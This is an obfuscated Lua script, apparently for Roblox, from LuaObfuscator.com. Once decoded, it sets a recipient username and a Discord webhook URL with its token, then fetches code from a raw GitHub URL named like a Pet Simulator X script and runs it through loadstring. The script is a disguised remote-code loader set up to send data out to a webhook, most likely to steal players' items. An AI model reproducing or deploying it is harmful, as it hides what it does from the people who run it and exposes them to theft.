--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.7) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v68=v2(v0(v30,16));if v19 then local v74=0;local v75;while true do if (v74==1) then return v75;end if (v74==0) then v75=v5(v68,v19);v19=nil;v74=1;end end else return v68;end end end);local function v20(v31,v32,v33)if v33 then local v69=(v31/((5 -3)^(v32-(2 -1))))%(2^(((v33-(1 -0)) -(v32-(2 -1))) + (620 -(555 + 11 + 53)))) ;return v69-(v69%(932 -(857 + (951 -(282 + 595))))) ;else local v70=(570 -(367 + (1838 -(1523 + 114))))^(v32-(1 + 0)) ;return (((v31%(v70 + v70))>=v70) and (928 -((304 -90) + 713))) or (0 + (1065 -(68 + 997))) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (1272 -(226 + 1044)) );v18=v18 + 2 ;return (v36 * (1114 -858)) + v35 ;end local function v23()local v37=0;local v38;local v39;local v40;local v41;while true do if (v37==(118 -(32 + 85))) then return (v41 * ((30184377 -13742562) + 335401)) + (v40 * (14533 + 51003)) + (v39 * 256) + v38 ;end if (v37==(957 -(892 + 65))) then v38,v39,v40,v41=v1(v16,v18,v18 + 3 );v18=v18 + ((359 -(87 + 263)) -5) ;v37=1 -0 ;end end end local function v24()local v42=180 -(67 + 113) ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(3 + 0)) then if (v47==(0 -0)) then if (v46==0) then return v48 * (0 + 0) ;else v47=443 -(416 + 26) ;v45=0 -0 ;end elseif (v47==2047) then return ((v46==(952 -(802 + 150))) and (v48 * ((2 -(3 -2))/0))) or (v48 * NaN) ;end return v8(v48,v47-(1855 -832) ) * (v45 + (v46/((2 + 0 + 0)^(1049 -(915 + (144 -62)))))) ;end if (v42==(0 -0)) then v43=v23();v44=v23();v42=1 + 0 ;end if (v42==(2 -0)) then v47=v20(v44,1208 -(1069 + 118) ,31);v48=((v20(v44,72 -40 )==1) and  -(1 -0)) or (1 + 0) ;v42=(442 -(145 + 293)) -1 ;end if (v42==1) then v45=1 + 0 ;v46=(v20(v44,792 -(368 + 423) ,62 -(472 -(44 + 386)) ) * ((20 -(10 + 8))^(122 -90))) + v43 ;v42=2;end end end local function v25(v49)local v50=1486 -(998 + 488) ;local v51;local v52;while true do if (v50==3) then return v6(v52);end if (v50==((2 -1) + 1)) then v52={};for v76=1 + 0 , #v51 do v52[v76]=v2(v1(v3(v51,v76,v76)));end v50=775 -(201 + 571) ;end if (v50==(1138 -(116 + 1022))) then v51=nil;if  not v49 then local v92=(0 + 0) -0 ;while true do if (v92==(0 + 0)) then v49=v23();if (v49==((0 + 0) -0)) then return "";end break;end end end v50=1;end if (v50==(3 -2)) then v51=v3(v16,v18,(v18 + v49) -(860 -(814 + 45)) );v18=v18 + v49 ;v50=2;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=0 -0 ;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v53==(605 -(268 + 335))) then v58=nil;v59=nil;v53=293 -(60 + 230) ;end if (v53==(578 -(386 + 192))) then v54=572 -(426 + 146) ;v55=nil;v53=1 + 0 ;end if (v53==3) then v60=nil;while true do if (v54==(1209 -(696 + 510))) then for v96=1 -0 ,v23() do v56[v96-(1263 -(1091 + 171)) ]=v28();end return v58;end if ((0 + 0)==v54) then v55={};v56={};v57={};v54=1;end if (v54==(6 -4)) then local v95=0 -0 ;while true do if ((375 -(123 + 251))~=v95) then else for v105=1,v23() do local v106=1024 -(706 + 318) ;local v107;local v108;local v109;while true do if (v106==(0 -0)) then v107=1251 -(721 + 530) ;v108=nil;v106=699 -(208 + 490) ;end if ((1 + 0)==v106) then v109=nil;while true do if (0~=v107) then else v108=0 + 0 ;v109=nil;v107=701 -(271 + 429) ;end if (v107==(1 + 0)) then while true do if (v108==(836 -(660 + 176))) then v109=v21();if (v20(v109,1 + 0 ,1 + 0 )==(1086 -(461 + 625))) then local v176=1288 -(993 + 295) ;local v177;local v178;local v179;local v180;while true do if (v176==(203 -(14 + 188))) then v179=nil;v180=nil;v176=2;end if (v176==0) then v177=0;v178=nil;v176=676 -(534 + 141) ;end if (v176==(1 + 1)) then while true do if (v177~=(0 + 0)) then else local v181=0 + 0 ;local v182;while true do if (0~=v181) then else v182=0;while true do if (v182==(1 -0)) then v177=1 -0 ;break;end if (v182==(529 -(406 + 123))) then v178=v20(v109,5 -3 ,2 + 1 );v179=v20(v109,3 + 1 ,6);v182=1323 -(1249 + 73) ;end end break;end end end if (v177==(397 -(115 + 281))) then v180={v22(),v22(),nil,nil};if (v178==(0 + 0)) then local v185=1900 -(106 + 1794) ;local v186;while true do if (0==v185) then v186=0 + 0 ;while true do if (0==v186) then v180[7 -4 ]=v22();v180[2 + 2 ]=v22();break;end end break;end end elseif (v178==(3 -2)) then v180[3]=v23();elseif (v178==(869 -(550 + 317))) then v180[3]=v23() -((2 -0)^16) ;elseif (v178==(3 -0)) then local v197=114 -(4 + 110) ;local v198;local v199;while true do if (v197==(584 -(57 + 527))) then local v200=0 -0 ;while true do if (v200~=(285 -(134 + 151))) then else v198=1665 -(970 + 695) ;v199=nil;v200=1 + 0 ;end if (v200~=1) then else v197=1 -0 ;break;end end end if (v197~=(1991 -(582 + 1408))) then else while true do if (v198==(0 -0)) then v199=0;while true do if (v199==(0 -0)) then v180[10 -7 ]=v23() -((2 -0)^(60 -44)) ;v180[170 -(122 + 44) ]=v22();break;end end break;end end break;end end end v177=1826 -(1195 + 629) ;end if (v177==2) then local v183=0 -0 ;while true do if (v183~=(1 + 0)) then else v177=244 -(187 + 54) ;break;end if (v183==0) then if (v20(v179,1 + 0 ,1)~=1) then else v180[3 -1 ]=v60[v180[67 -(30 + 35) ]];end if (v20(v179,2,782 -(162 + 618) )==1) then v180[3 + 0 ]=v60[v180[1260 -(1043 + 214) ]];end v183=1 + 0 ;end end end if (v177==(1215 -(323 + 889))) then if (v20(v179,2 + 1 ,583 -(361 + 219) )==1) then v180[8 -4 ]=v60[v180[6 -2 ]];end v55[v105]=v180;break;end end break;end end end break;end end break;end end break;end end end v54=1 + 2 ;break;end if (v95~=0) then else local v104=1636 -(1373 + 263) ;while true do if (v104==(1000 -(451 + 549))) then for v111=414 -(15 + 398) ,v59 do local v112=0 + 0 ;local v113;local v114;local v115;while true do if (v112~=(1 -0)) then else v115=nil;while true do if (v113~=0) then else local v174=0;while true do if (v174~=1) then else v113=1;break;end if (v174==0) then v114=v21();v115=nil;v174=1 -0 ;end end end if (1~=v113) then else if (v114==(1385 -(746 + 638))) then v115=v21()~=(0 + 0) ;elseif (v114==(2 -0)) then v115=v24();elseif (v114~=3) then else v115=v25();end v60[v111]=v115;break;end end break;end if ((0 + 0)~=v112) then else v113=341 -(218 + 123) ;v114=nil;v112=1582 -(1535 + 46) ;end end end v58[3 + 0 ]=v21();v104=1;end if (v104==(1 + 0)) then v95=1;break;end end end end end if (v54==(561 -(306 + 254))) then v58={v55,v56,nil,v57};v59=v23();v60={};v54=1 + 1 ;end end break;end if (v53~=(1468 -(899 + 568))) then else v56=nil;v57=nil;v53=2 + 0 ;end end end local function v29(v61,v62,v63)local v64=0;local v65;local v66;local v67;while true do if (v64==1) then v67=v61[3];return function(...)local v78=v65;local v79=v66;local v80=v67;local v81=v27;local v82=1;local v83= -1;local v84={};local v85={...};local v86=v12("#",...) -1 ;local v87={};local v88={};for v93=0,v86 do if (v93>=v80) then v84[v93-v80 ]=v85[v93 + 1 ];else v88[v93]=v85[v93 + 1 ];end end local v89=(v86-v80) + 1 ;local v90;local v91;while true do local v94=0;while true do if (v94==1) then if (v91<=4) then if (v91<=1) then if (v91>0) then v88[v90[2]]=v63[v90[3]];else do return;end end elseif (v91<=2) then local v118=0;local v119;local v120;while true do if (v118==4) then v82=v82 + 1 ;v90=v78[v82];v120=v90[2];v119=v88[v90[3]];v88[v120 + 1 ]=v119;v88[v120]=v119[v90[4]];v118=5;end if (v118==0) then v119=nil;v120=nil;v88[v90[2]]=v63[v90[3]];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]][v90[3]]=v90[4];v118=1;end if (2==v118) then v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v63[v90[3]];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]][v90[3]]=v90[4];v118=3;end if (v118==5) then v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v90[3];break;end if (v118==3) then v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v63[v90[3]];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v63[v90[3]];v118=4;end if (v118==1) then v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v63[v90[3]];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]][v90[3]]=v90[4];v118=2;end end elseif (v91==3) then v88[v90[2]]();else v88[v90[2]][v90[3]]=v90[4];end elseif (v91<=6) then if (v91>5) then local v121=0;local v122;local v123;while true do if (v121==0) then v122=v90[2];v123=v88[v90[3]];v121=1;end if (v121==1) then v88[v122 + 1 ]=v123;v88[v122]=v123[v90[4]];break;end end else local v124=0;local v125;local v126;local v127;local v128;while true do if (v124==1) then v83=(v127 + v125) -1 ;v128=0;v124=2;end if (2==v124) then for v171=v125,v83 do v128=v128 + 1 ;v88[v171]=v126[v128];end break;end if (v124==0) then v125=v90[2];v126,v127=v81(v88[v125](v13(v88,v125 + 1 ,v90[3])));v124=1;end end end elseif (v91<=7) then local v129=0;local v130;while true do if (v129==0) then v130=v90[2];v88[v130]=v88[v130](v13(v88,v130 + 1 ,v83));break;end end elseif (v91>8) then v88[v90[2]]=v90[3];else v88[v90[2]]=v90[3]~=0 ;end v82=v82 + 1 ;break;end if (0==v94) then v90=v78[v82];v91=v90[1];v94=1;end end end end;end if (v64==0) then v65=v61[1];v66=v61[2];v64=1;end end end return v29(v28(),{},v17)(...);end v15("LOL!0A3O0003023O005F4703083O00557365724E616D6503093O004C79706865725F313703093O00557365724E616D653203073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O31302O373532303930313537323033352O362F2O443573506C646833435147745651452D6C43506C47446E566E46614F376C53554C6E694A766C722O2D51434B554143797037516377383456702O536C435F4F537A4164030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034E3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4C7970686572582D5363726970745A2F6D61696E2F505358534352254334254230505458000F3O0012023O00013O00304O0002000300124O00013O00304O0004000300124O00013O00304O0005000600124O00073O00122O000100083O00202O00010001000900122O0003000A4O0008000400014O0005000100044O00075O00022O00033O000100016O00017O00",v9(),...);end
